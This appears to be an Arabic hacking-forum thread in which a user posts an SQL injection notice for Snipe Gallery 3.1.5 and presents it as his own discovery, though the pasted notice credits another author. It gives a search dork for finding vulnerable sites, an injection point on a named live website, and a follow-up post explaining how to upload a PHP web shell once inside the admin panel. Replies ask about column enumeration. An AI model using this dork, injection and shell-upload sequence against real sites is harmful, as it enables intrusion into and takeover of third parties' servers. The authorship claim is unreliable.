السلام عليكم والحمد لله اليوم اكتشفت ثغرة بنفسي والحمد لله شوفو الثغرة # Exploit Title: snipe gallery Script Sql Injection # Date: 26/06/2010 # Author...

mobdeen

New Member
ثغرة من اكتشافي ادخل يا [you]
السلام عليكم
والحمد لله اليوم اكتشفت ثغرة بنفسي والحمد لله
شوفو الثغرة
PHP:
# Exploit Title:   snipe gallery Script Sql Injection
# Date: 26/06/2010
# Author: dev!l ghost
# Email: aws(at)live(dot)it
# Site : www.h00forall.com
# Script url: http://sourceforge.net/projects/snipegallery/
# Version: 3.1.5
# Tested on: Windows
# CVE : ()
  
:::::::::::::::::::::::::
  
  
=================Exploit=================
DorK:(Snipe Gallery v.3.1.5 by Snipe.Net)

When You search with the dork you will find a lot of sites ,,enter
site and you will find a lot of pictures enter any picture and 
the pot the(')and start the inject

the inject is very easy 



----exploit----   

{{DeMo}}
http://www.onesteppublishing.com/snipe/image.php?page=1&search_type=and&image_id=78(SQLI)

---------greatz----------
Greatz to all my frinds and the all muslims 
and Volc4n0 and Golden Ice and mr.ip
and the all 

thank you

كلمة شكر تكفيني وتشجعني على المزيد لا تنسون smilies15smilies15
 

TheGame

New Member
ثغرة من اكتشافي ادخل يا [you]
بارك الله فيك اخي الى الامام بس اخي ممكن سوال لماذا عند استعمال امر order+by لا يقولي كم عامود مصاب ارجو الشرح
 

Zero

New Member
ثغرة من اكتشافي ادخل يا [you]
بارك الله فيك اخي الى الامام بس اخي ممكن سوال لماذا عند استعمال امر order+by لا يقولي كم عامود مصاب ارجو الشرح
[align=center] قد تكون مرقعه او بلند[/align]
 

KOUROGA3

New Member
ثغرة من اكتشافي ادخل يا [you]
السلام عليكم اخي مبدع ديما وصل ماشاء الله الله يعطيك العافية وصل ديما مبدع
 

mobdeen

New Member
ثغرة من اكتشافي ادخل يا [you]
والله العظيم نورتو الموضوع
ونسيت اقول لكم عندما تدخل لوحة التحكم بس اضغط على
upload image
وارفع شلك بصيغةphp
وتكون مسار الشل
www.xxxxx.com/photos/shell.php
 

KaLa$nikoV

<b><font color="DarkRed" size="2">VBSPIDERS TEAM</
ثغرة من اكتشافي ادخل يا [you]
مبروك الاكتشاف يا اخوي

ياريت ترسلها لموقع

exploit-db.com

حتى يسجلوها باسمك

كل الي عليك تراسل هاد الايميل الموجود بالصفحه وتتبع الشروط


exploit-db/stuff

kEEp Up
 

mr.vih

New Member
ثغرة من اكتشافي ادخل يا [you]
السلام عليكم
فاجئتني كثيرا يا غالي
والله
حيث أنني لا أعرفك
وتهديني الثغرات ..
شكرا جزيلا
 
أعلى